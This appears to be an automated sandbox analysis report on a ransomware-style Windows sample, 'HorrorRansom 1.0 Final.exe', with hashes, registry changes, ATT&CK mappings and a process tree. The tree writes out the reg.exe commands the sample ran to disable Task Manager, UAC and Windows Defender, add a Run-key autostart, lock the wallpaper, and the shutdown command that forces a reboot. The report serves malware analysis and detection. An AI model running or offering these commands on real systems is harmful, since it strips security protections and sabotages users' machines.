Analysis
-
max time kernel
4s -
max time network
7s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
08-11-2024 14:13
Behavioral task
behavioral1
Sample
Dest/HorrorBob2.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
Dest/HorrorRansom 1.0 Final.exe
Resource
win11-20241007-en
Behavioral task
behavioral3
Sample
Dest/HorrorTrojan Ultimate Edition.exe
Resource
win11-20241007-en
Behavioral task
behavioral4
Sample
Dest/HorrorTrojan123.exe
Resource
win11-20241007-en
Behavioral task
behavioral5
Sample
Dest/Start.bat
Resource
win11-20241007-en
Behavioral task
behavioral6
Sample
Dest/covid20.exe
Resource
win11-20241007-en
Errors
General
-
Target
Dest/HorrorRansom 1.0 Final.exe
-
Size
1.7MB
-
MD5
1a8e74c4bb9a2c5b38b4412a6b484737
-
SHA1
c01eb730609125dc55641d1aa377d890941b9e83
-
SHA256
ed73b148716d6015b1466ee92cb331070a90d8a433ee768984cec665970fd327
-
SHA512
a531fb0fb00dddfd379086d2f0f868447fe7d111d242ecfb27fd468d75dfb6761ee6c13b2fb73a0ec8990b86ce1fb0407a47c2223c712a6752d3ca096c5cd204
-
SSDEEP
49152:ot42t5QZkBhBhyKui/2gDSr8XTh3FQ+G7wKC:2QgybsbDBYwK
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" reg.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" reg.exe -
Processes:
resource yara_rule behavioral2/memory/4760-0-0x0000000000400000-0x0000000000A12000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\81C3.tmp\HostFile.exe upx behavioral2/memory/4760-15-0x0000000000400000-0x0000000000A12000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
HorrorRansom 1.0 Final.exereg.exereg.exereg.exereg.exeshutdown.execmd.exereg.exereg.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HorrorRansom 1.0 Final.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "209" LogonUI.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
shutdown.exedescription pid process Token: SeShutdownPrivilege 2444 shutdown.exe Token: SeRemoteShutdownPrivilege 2444 shutdown.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
LogonUI.exepid process 4880 LogonUI.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
HorrorRansom 1.0 Final.execmd.exedescription pid process target process PID 4760 wrote to memory of 2288 4760 HorrorRansom 1.0 Final.exe cmd.exe PID 4760 wrote to memory of 2288 4760 HorrorRansom 1.0 Final.exe cmd.exe PID 4760 wrote to memory of 2288 4760 HorrorRansom 1.0 Final.exe cmd.exe PID 2288 wrote to memory of 2140 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2140 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2140 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2732 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2732 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2732 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2524 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2524 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2524 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2500 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2500 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2500 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2816 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2816 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2816 2288 cmd.exe reg.exe PID 2288 wrote to memory of 4812 2288 cmd.exe reg.exe PID 2288 wrote to memory of 4812 2288 cmd.exe reg.exe PID 2288 wrote to memory of 4812 2288 cmd.exe reg.exe PID 2288 wrote to memory of 2444 2288 cmd.exe shutdown.exe PID 2288 wrote to memory of 2444 2288 cmd.exe shutdown.exe PID 2288 wrote to memory of 2444 2288 cmd.exe shutdown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd""2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2140 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f3⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:2732 -
C:\Windows\SysWOW64\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2524 -
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2500 -
C:\Windows\SysWOW64\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:2816 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4812 -
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 003⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39b3055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4880
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD547f426fb3883f2da30e9aa2a7d693fa5
SHA150d843d68817717f21ba96d26a571ad996a5e35a
SHA256b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b
SHA5122e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb
-
Filesize
72KB
MD5c875f76e521f520404401122bd82630a
SHA13b1c78420a55b9a768b28168753c4e22982421ef
SHA256a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11
SHA512b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b
-
Filesize
5.9MB
MD5ed30c76a614ec8db5e4ac22e2929f53d
SHA127ab24ede0ec37cedd2cbf4d9f7135375f031fa4
SHA25696df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a
SHA512ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b